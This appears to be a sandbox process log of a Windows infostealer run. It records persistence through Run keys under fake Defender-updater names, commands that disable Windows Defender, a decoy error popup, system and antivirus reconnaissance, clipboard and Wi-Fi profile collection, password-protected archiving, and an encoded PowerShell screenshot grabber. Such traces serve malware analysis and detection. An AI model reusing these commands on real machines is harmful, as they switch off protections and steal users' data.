C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F7BE.tmp\F7BF.tmp\F7C0.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\WGArS.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI31642\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\WGArS.zip" *
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF7E.tmp\FF7F.tmp\FF80.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Windows\system32\java.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EEF.tmp\EF0.tmp\EF1.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\172D.tmp\172E.tmp\172F.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1ECE.tmp\1ECF.tmp\1ED0.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2621.tmp\2622.tmp\2623.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
